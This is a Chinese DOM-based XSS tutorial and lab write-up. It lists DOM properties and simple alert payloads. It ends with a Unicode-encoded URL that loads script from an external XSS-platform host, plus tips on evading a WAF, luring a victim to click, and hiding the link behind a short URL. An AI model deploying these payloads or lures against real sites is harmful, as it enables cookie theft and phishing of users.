xss三部曲 - 3
作者:互联网
Dom
Dom 是Document Object Model
的简称,是基于文档对象模型的一种漏洞。 Dom 是一个与平台、编译语言无关的接口(通信渠道)
程序和脚本可以通过 dom 接口来修改前端页面显示
document.cookie:获取(设置)当前页面的 Cookie
document.domain:返回当前域名
document.lastModifed:返回最后修改时间(识别伪静态)
document.referer:返回载入当前页面url
document.URL:返回当前页面url
document.title:返回title
document.write:修改当前页面
document.write('<script>alert(1)</script>')
var pos //$pos
document.URL.indexOF("#") //返回当前页面 # 首次出现的位置
var pos=document.URL.indexOF("name=")+5
#:锚点(书签、索引)
document.getElementById("")选中
document.innerHTML:获取或修改选中的值
<img src='# one rror=alert(1) />
三种dom
- windows
- document:操纵网页
- location:返回端口号、主机名、锚点后的值...
location.hash.substr(1);
//取锚点后的值
document.write
JS可以通过 Native 编码
wp
源码中写了document.write()
,可以试试xss,它会将url的请求回显在页面上
写入xss弹窗(注意,访问index.php/1.txt:当他不存在时不触发安全狗;先闭合之前的<script>
)
向投诉中心发送请求:
反正就是说一些诱导你点击网址的话,我说什么你也会点的吧
利用xss平台生成payload,用 Native 加密(直接ASCII转Native即可)
反正就是说一些诱导你点击网址的话,我说什么你也会点的吧http://59.63.200.79:8014/dom_xss/index.php?asd=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u0071\u006d\u006f\u0052\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e
也可以使用短链接转换
<img src='#' one rror=alert(1) />
<svg onl oad="alert(1)">
标签:xss,三部曲,u002f,write,u0073,document,页面 来源: https://www.cnblogs.com/1ta-chi/p/15740800.html